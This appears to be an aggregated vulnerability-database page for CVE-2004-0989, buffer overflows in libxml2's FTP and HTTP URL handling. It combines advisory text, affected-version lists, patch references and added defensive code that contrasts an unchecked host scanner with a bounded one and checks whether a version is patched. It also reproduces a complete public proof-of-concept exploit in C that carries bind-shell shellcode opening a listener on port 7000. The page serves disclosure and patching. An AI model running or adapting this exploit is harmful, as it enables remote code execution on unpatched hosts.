CVE-2004-0989
CVSS 10.0
Published: 2005-03-01 00:00:00
Revised: 2016-10-17 22:50:29
NMCOES

[Original text] Multiple buffer overflows in libXML 2.6.12 and 2.6.13 (libxml2), and possibly other versions, may allow remote attackers to execute arbitrary code via (1) a long FTP URL that is not properly handled by the xmlNanoFTPScanURL function, (2) a long proxy URL containing FTP data that is not properly handled by the xmlNanoFTPScanProxy function, and other overflows related to manipulation of DNS length values, including (3) xmlNanoFTPConnect, (4) xmlNanoHTTPConnectHost, and (5) xmlNanoHTTPConnectHost.


[CNNVD] libxml2 buffer overflow vulnerability (CNNVD-200503-029)

        Libxml2 is the XML C parser and toolkit developed by the Gnome project.
        Libxml2 mishandles certain kinds of URLs; a remote attacker can exploit this to carry out buffer overflow attacks.
        Issue one: a buffer overflow when parsing FTP URLs. User-supplied data is copied straight into a fixed-size buffer without any length check, which triggers the overflow.
        Issue two: a buffer overflow when parsing proxy URL data. Again, user-supplied data is copied straight into a fixed-size buffer without any length check.
        Issue three: multiple buffer overflows in the code that resolves names through DNS. An attacker who runs a malicious DNS server, or who spoofs DNS replies on the LAN, may be able to execute arbitrary instructions on the system with the privileges of the affected process.
        

- CVSS (base score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:xmlsoft:libxml2:2.6.13    XMLSoft Libxml2 2.6.13
cpe:/a:xmlsoft:libxml2:2.6.9    XMLSoft Libxml2 2.6.9
cpe:/a:xmlsoft:libxml2:2.6.8    XMLSoft Libxml2 2.6.8
cpe:/a:xmlsoft:libxml2:2.5.11    XMLSoft Libxml2 2.5.11
cpe:/a:xmlsoft:libxml2:2.6.12    XMLSoft Libxml2 2.6.12
cpe:/o:redhat:fedora_core:core_2.0
cpe:/a:xmlsoft:libxml2:2.6.14    XMLSoft Libxml2 2.6.14
cpe:/a:xmlsoft:libxml2:2.6.11    XMLSoft Libxml2 2.6.11
cpe:/a:xmlsoft:libxml2:2.6.7    XMLSoft Libxml2 2.6.7
cpe:/a:xmlsoft:libxml2:2.6.6    XMLSoft Libxml2 2.6.6
cpe:/o:trustix:secure_linux:2.1    Trustix Secure Linux 2.1
cpe:/o:ubuntu:ubuntu_linux:4.1::ppc
cpe:/o:trustix:secure_linux:2.0    Trustix Secure Linux 2.0
cpe:/a:xmlstarlet:command_line_xml_toolkit:0.9.1
cpe:/o:ubuntu:ubuntu_linux:4.1::ia64
cpe:/a:xmlsoft:libxml:1.8.17

- OVAL (technical details for detection)

oval:org.mitre.oval:def:1173    Multiple Buffer Overflows in libXML2
oval:org.mitre.oval:def:10505    Multiple buffer overflows in libXML 2.6.12 and 2.6.13 (libxml2), and possibly other versions, may allow remote attackers to execute arbitrar...
*The OVAL definitions describe in detail how to detect this vulnerability; see the linked definitions for the technical details of the checks.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0989
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0989
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200503-029
(official data source) CNNVD

- Other links and resources

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000890
(UNKNOWN)  CONECTIVA  CLA-2004:890
http://lists.apple.com/archives/security-announce/2005/Jan/msg00001.html
(UNKNOWN)  APPLE  APPLE-SA-2005-01-25
http://marc.info/?l=bugtraq&m=109880813013482&w=2
(UNKNOWN)  BUGTRAQ  20041026 libxml2 remote buffer overflows (not in xml parsing code though)
http://marc.info/?l=bugtraq&m=110972110516151&w=2
(UNKNOWN)  UBUNTU  USN-89-1
http://securitytracker.com/id?1011941
(UNKNOWN)  SECTRACK  1011941
http://www.ciac.org/ciac/bulletins/p-029.shtml
(UNKNOWN)  CIAC  P-029
http://www.debian.org/security/2004/dsa-582
(UNKNOWN)  DEBIAN  DSA-582
http://www.gentoo.org/security/en/glsa/glsa-200411-05.xml
(UNKNOWN)  GENTOO  GLSA-200411-05
http://www.novell.com/linux/security/advisories/2005_01_sr.html
(UNKNOWN)  SUSE  SUSE-SR:2005:001
http://www.redhat.com/support/errata/RHSA-2004-615.html
(UNKNOWN)  REDHAT  RHSA-2004:615
http://www.redhat.com/support/errata/RHSA-2004-650.html
(UNKNOWN)  REDHAT  RHSA-2004:650
http://www.securityfocus.com/bid/11526
(VENDOR_ADVISORY)  BID  11526
http://xforce.iss.net/xforce/xfdb/17870
(VENDOR_ADVISORY)  XF  libxml2-xmlnanoftpscanurl-bo(17870)
http://xforce.iss.net/xforce/xfdb/17872
(UNKNOWN)  XF  libxml2-nanoftp-file-bo(17872)
http://xforce.iss.net/xforce/xfdb/17875
(VENDOR_ADVISORY)  XF  libxml2-xmlnanoftpscanproxy-bo(17875)
http://xforce.iss.net/xforce/xfdb/17876
(UNKNOWN)  XF  libxml2-nanohttp-file-bo(17876)

- Vulnerability information

libxml2 buffer overflow vulnerability
Severity: Critical    Type: Buffer overflow
Published: 2005-03-01 00:00:00    Updated: 2005-10-20 00:00:00
Remote

- Advisories and patches

        The CNNVD entry originally noted that the vendor had not yet provided a patch or upgrade. The OSVDB and BID entries below report libxml2 2.6.15 as the first fixed release, so users of this software should upgrade to 2.6.15 or later, or apply their distribution's update, and watch the vendor's homepage for new versions:
        http://www.xmlsoft.org/

- Vulnerability information (24704)

Libxml2 Multiple Remote Stack Buffer Overflow Vulnerabilities (EDBID:24704)
Platform: linux    Type: remote
Date: 2004-10-26    Verified
Port: 0    Author: Sean
Vulnerable app: N/A
source: http://www.securityfocus.com/bid/11526/info

The 'libxml2' library is reported prone to multiple remote stack-based buffer-overflow vulnerabilities caused by insufficient boundary checks. Remote attackers may exploit these issues to execute arbitrary code on a vulnerable computer. 

The URI parsing functionality and the DNS name resolving code are affected. 

These issues affect libxml2 2.6.12 through 2.6.14. Other versions may also be affected.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

/*
 *  libxml 2.6.12 nanoftp bof POC   infamous42mdAThotpopDOTcom
 *
 *  [n00b@localho.outernet] gcc -Wall libsuxml.c -lxml2
 *  [n00b@localho.outernet] ./a.out
 *  Usage: ./a.out <retaddr> [ align ]
 *  [n00b@localho.outernet] netstat -ant | grep 7000
 *  [n00b@localho.outernet] ./a.out 0xbfff0360
 *  xmlNanoFTPScanURL: Use [IPv6]/IPv4 format
 *  [n00b@localho.outernet] netstat -ant | grep 7000
 *  tcp        0      0 0.0.0.0:7000            0.0.0.0:*               LISTEN
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <libxml/nanoftp.h>

#define die(x) do{ perror((x)); exit(1); }while(0)
#define BS 0x10000          /* size of the URL buffer handed to libxml2 (64 KiB) */
#define NOP 0x90            /* i386 NOP, used for the sled */
#define NNOPS 3000          /* length of the NOP sled */
#define ALIGN 0             /* default padding before the return-address run */

/* i386 Linux bind shell: listens on TCP port 7000 (0x1b58), accepts one
 * connection, dup2()s the socket onto fds 0-2 and execve()s /bin//sh.
 * That is the LISTEN socket shown in the netstat output above. */
#define SHELL_LEN (sizeof(sc)-1)
char sc[] =
    "\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6"
    "\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50"
    "\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a"
    "\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31"
    "\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0"
    "\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80"
    "\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
    "\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";


/*
 * Payload layout, passed to xmlNanoFTPScanURL() through xmlNanoFTPNewCtxt():
 *
 *   "://["  NOP sled (3000)  shellcode  [align pad]  retaddr x 500 (2000 bytes)  "]"
 *
 * The leading "[" sends the scanner down its bracketed ([IPv6]) host path,
 * which copies everything up to the closing "]" into a fixed-size buffer with
 * no length check; the repeated return address overwrites the saved return
 * address with a guess that lands somewhere in the NOP sled.
 */
int main(int argc, char **argv)
{
    int x = 0, len = 0;
    char    buf[BS] = {'A',};
    long    retaddr = 0, align = ALIGN;

    if(argc < 2){
        fprintf(stderr, "Usage: %s <retaddr> [ align ]\n", argv[0]);
        return EXIT_FAILURE;
    }
    if(sscanf(argv[1], "%lx", &retaddr) != 1)
        die("sscanf");
    if(argc > 2)
        align = atoi(argv[2]);
    if(align < 0 || align > 3)
        die("nice try newblar");

    strncpy(buf, "://[", 4);            /* force the bracketed-host code path */
    len += 4;
    memset(buf+len, NOP, NNOPS);        /* NOP sled */
    len += NNOPS;
    memcpy(buf+len, sc, SHELL_LEN);     /* bind shell */
    len += SHELL_LEN;

    len += align;                       /* optional 0-3 byte shift of the retaddr run */
    /* repeat the guessed return address until the 2000-byte run is full */
    for(x = 0; x < 2000 - (sizeof(retaddr) - 1); x += sizeof(retaddr))
        memcpy(buf+len+x, &retaddr, sizeof(retaddr));
    buf[len+x] = ']';                   /* close the bracketed host */
    buf[len+x+1] = 0;

    xmlNanoFTPNewCtxt(buf);             /* calls xmlNanoFTPScanURL() on the payload */

    return EXIT_SUCCESS;
}

- Vulnerability information

11179
Libxml2 FTP URL Processing Overflow
Classification: Remote / Network Access, Input Manipulation
Impact: Loss of Integrity, Loss of Availability
Status: Exploit Public, Vendor Verified

- Vulnerability description

A remote overflow exists in Libxml2. libxml2's nanoftp.c xmlNanoFTPScanURL() function fails to perform boundary checking of user-supplied data that is copied into a finite stack buffer, which could potentially cause a stack-based overflow. Using a specially crafted URL, an attacker can cause a denial of service or execute arbitrary code resulting in a loss of integrity or availability.
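
The bug class described in this entry and in the CNNVD text above (a host copied out of a bracketed FTP URL into a fixed-size buffer with no length check), as an added example that is not libxml2's code or anything from the advisories. The buffer size NANO_URLBUF (4096) and the function names are assumptions for illustration; the 5132-byte host length reproduces the layout of the PoC above with align 0 (3000 NOPs, 132 shellcode bytes, 2000 bytes of return address, by my count). The unchecked scanner is shown beside the bounded one; only the bounded one is ever given the overlong URL.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NANO_URLBUF 4096   /* assumed size of the scanner's fixed buffer */

/* Bytes of the bracketed host in "...://[host]...", 0 if malformed. */
static size_t bracket_host_len(const char *url)
{
    const char *p = strstr(url, "://[");
    const char *q;
    if (p == NULL)
        return 0;
    p += 4;
    q = strchr(p, ']');
    return q ? (size_t)(q - p) : 0;
}

/* Vulnerable pattern (illustrative): copies the host into a fixed buffer
 * until ']' with no bound, the missing check the entries describe.
 * Call it only with hosts already known to fit; nothing below hands it
 * an overlong URL. */
static int scan_host_vulnerable(const char *url, char host[NANO_URLBUF])
{
    const char *p = strstr(url, "://[");
    size_t i = 0;
    if (p == NULL)
        return -1;
    p += 4;
    while (*p != '\0' && *p != ']')
        host[i++] = *p++;          /* i is never compared with NANO_URLBUF */
    if (*p != ']')
        return -1;
    host[i] = '\0';
    return 0;
}

/* Hardened pattern: same parse, bounded by the caller's buffer size;
 * an overlong host is rejected rather than truncated or overflowed. */
static int scan_host_safe(const char *url, char *host, size_t hostsz)
{
    const char *p = strstr(url, "://[");
    size_t i = 0;
    if (p == NULL || hostsz == 0)
        return -1;
    p += 4;
    while (*p != '\0' && *p != ']') {
        if (i + 1 >= hostsz)       /* keep room for the terminator */
            return -1;
        host[i++] = *p++;
    }
    if (*p != ']')
        return -1;
    host[i] = '\0';
    return 0;
}

/* Constructed input: "://[" + n filler bytes + "]", the shape of the PoC's
 * URL with sled, shellcode and return addresses replaced by 'A'. Caller frees. */
static char *make_bracket_url(size_t n)
{
    char *u = malloc(n + 6);
    if (u == NULL)
        return NULL;
    memcpy(u, "://[", 4);
    memset(u + 4, 'A', n);
    u[4 + n] = ']';
    u[5 + n] = '\0';
    return u;
}

/* Host length the PoC produces with align 0: NOP sled + shellcode + retaddr run. */
#define POC_HOST_LEN (3000 + 132 + 2000)

int main(void)
{
    char host[NANO_URLBUF];
    char *poc = make_bracket_url(POC_HOST_LEN);
    if (poc == NULL)
        return 1;
    printf("PoC host is %zu bytes, buffer is %d: %s\n", bracket_host_len(poc),
           NANO_URLBUF, bracket_host_len(poc) > NANO_URLBUF ? "would overflow" : "fits");
    printf("bounded scanner on the PoC URL: %s\n",
           scan_host_safe(poc, host, sizeof host) == 0 ? "accepted" : "rejected");
    if (scan_host_safe("ftp://[::1]/pub/", host, sizeof host) == 0)
        printf("bounded scanner on ftp://[::1]/pub/: host=%s\n", host);
    if (scan_host_vulnerable("ftp://[::1]/pub/", host) == 0)
        printf("unchecked scanner on the same short URL: host=%s\n", host);
    free(poc);
    return 0;
}
```

The fix is the one extra comparison in the copy loop; rejecting rather than silently truncating also keeps a too-long host from being parsed into a different address than the caller intended.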

- Timeline

2004-10-26 Unknown
2004-10-25 Unknown

- Solution

Upgrade to version 2.6.15 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
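
A version gate for the fix noted above, as an added example that is not from libxml2 or any advisory: it parses a dotted libxml2 version string, or the numeric form libxml2 itself exposes as LIBXML_VERSION (e.g. 20612 for 2.6.12), and reports whether it predates 2.6.15, the first release this entry reports as fixed. The libxml 1.8.17 line listed as affected above falls out of the same comparison. Function names are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define FIXED_VERSION 20615L   /* 2.6.15, first release reported fixed */

/* Parses "major.minor.micro" (micro optional) into libxml2's MMmmuu integer
 * form; returns -1 on junk, missing components, or more than three parts. */
static long parse_dotted_version(const char *s)
{
    unsigned long parts[3] = {0, 0, 0};
    int i;
    for (i = 0; i < 3; i++) {
        char *end;
        if (!isdigit((unsigned char)*s))
            return -1;
        parts[i] = strtoul(s, &end, 10);
        if (parts[i] > 99)
            return -1;
        s = end;
        if (*s == '\0')
            break;
        if (*s != '.')
            return -1;
        s++;
    }
    if (*s != '\0')                /* trailing junk or a fourth component */
        return -1;
    return (long)(parts[0] * 10000 + parts[1] * 100 + parts[2]);
}

/* 1 if the numeric version is older than the fix, 0 otherwise. */
static int libxml_numeric_version_affected(long v)
{
    return v < FIXED_VERSION;
}

/* 1 if affected, 0 if fixed, -1 if the string could not be parsed. */
static int libxml_version_affected(const char *version)
{
    long v = parse_dotted_version(version);
    if (v < 0)
        return -1;
    return libxml_numeric_version_affected(v);
}

int main(void)
{
    /* versions taken from the affected / unaffected lists on this page */
    const char *samples[] = {"1.8.17", "2.5.11", "2.6.12", "2.6.14", "2.6.15", "2.6"};
    size_t n = sizeof samples / sizeof samples[0];
    size_t i;
    for (i = 0; i < n; i++) {
        int r = libxml_version_affected(samples[i]);
        printf("%-8s %s\n", samples[i],
               r < 0 ? "unparsable" : r ? "affected (< 2.6.15)" : "fixed");
    }
    return 0;
}
```

Feed it the output of `xml2-config --version` or the LIBXML_DOTTED_VERSION macro of the build you link against. The comparison is against upstream numbering only: the RHSA, DSA, USN and other advisories referenced above ship backported fixes under older version strings, so for distribution packages check the package's advisory rather than the upstream version.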


- Vulnerability information

Libxml2 Multiple Remote Stack Buffer Overflow Vulnerabilities
Class: Boundary Condition Error    BID: 11526
Remote: Yes    Local: No
Published: 2004-10-26 12:00:00    Updated: 2009-08-21 03:55:00
Discovery is credited to Sean <infamous41md@hotpop.com>.

- Affected program versions

XMLStarlet Command Line XML Toolkit 0.9.1
+ S.u.S.E. Linux Personal 9.2
XMLSoft Libxml2 2.6.14
+ OpenPKG OpenPKG Current
XMLSoft Libxml2 2.6.13
XMLSoft Libxml2 2.6.12
XMLSoft Libxml2 2.6.11
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
XMLSoft Libxml2 2.6.9
+ Conectiva Linux 10.0
+ Conectiva Linux 9.0
XMLSoft Libxml2 2.6.8
+ Red Hat Fedora Core2
XMLSoft Libxml2 2.6.7
XMLSoft Libxml2 2.6.6
XMLSoft Libxml2 2.5.11
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
XMLSoft Libxml 1.8.17
+ Conectiva Linux 10.0
+ Conectiva Linux 9.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Ubuntu Ubuntu Linux 4.1 ppc
Ubuntu Ubuntu Linux 4.1 ia64
Ubuntu Ubuntu Linux 4.1 ia32
Turbolinux Turbolinux Workstation 8.0
Turbolinux Turbolinux Workstation 7.0
Turbolinux Turbolinux Server 10.0
Turbolinux Turbolinux Server 9.0
Turbolinux Turbolinux Server 8.0
Turbolinux Turbolinux Server 7.0
Turbolinux Turbolinux Desktop 10.0
Turbolinux Turbolinux 7.0
Turbolinux Appliance Server Workgroup Edition 1.0
Turbolinux Appliance Server Hosting Edition 1.0
Turbolinux Appliance Server 1.0 Workgroup Edition
Turbolinux Appliance Server 1.0 Hosting Edition
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Trustix Secure Enterprise Linux 2.0
SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
+ Linux kernel 2.4.19
SuSE SUSE Linux Enterprise Server 7
+ Linux kernel 2.4.19
SGI ProPack 3.0
SGI Advanced Linux Environment 3.0
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux Enterprise Server 9
S.u.S.E. Linux Desktop 1.0
S.u.S.E. Linux 8.1
S.u.S.E. Linux 8.0 i386
S.u.S.E. Linux 8.0
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 2.1 IA64
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 2.1 IA64
RedHat Enterprise Linux ES 2.1
RedHat Desktop 3.0
RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
RedHat Advanced Workstation for the Itanium Processor 2.1
Red Hat Fedora Core2
Red Hat Fedora 11
Red Hat Fedora 10
Red Hat Enterprise Linux AS 3
Red Hat Enterprise Linux AS 2.1 IA64
Red Hat Enterprise Linux AS 2.1
Apple Mac OS X Server 10.3.7
Apple Mac OS X Server 10.3.6
Apple Mac OS X Server 10.3.5
Apple Mac OS X Server 10.3.4
Apple Mac OS X Server 10.3.3
Apple Mac OS X Server 10.3.2
Apple Mac OS X Server 10.3.1
Apple Mac OS X Server 10.3
Apple Mac OS X 10.3.7
Apple Mac OS X 10.3.6
Apple Mac OS X 10.3.5
Apple Mac OS X 10.3.4
Apple Mac OS X 10.3.3
Apple Mac OS X 10.3.2
Apple Mac OS X 10.3.1
Apple Mac OS X 10.3

- Unaffected program versions

XMLSoft Libxml2 2.6.15
Apple Mac OS X Server 10.3.8
Apple Mac OS X 10.3.8


- Exploit

Exploit code is public; see the EDB-24704 entry above (the PoC credited to Sean).

- Solution

Fixes are available. Please see the references for details. Vendor fixes are listed for:

XMLSoft Libxml 1.8.17
Apple Mac OS X Server 10.3.7
Apple Mac OS X 10.3.7
XMLSoft Libxml2 2.5.11
XMLSoft Libxml2 2.6.11
XMLSoft Libxml2 2.6.12
XMLSoft Libxml2 2.6.13
XMLSoft Libxml2 2.6.14
XMLSoft Libxml2 2.6.6
XMLSoft Libxml2 2.6.7
XMLSoft Libxml2 2.6.8
XMLSoft Libxml2 2.6.9
SGI ProPack 3.0

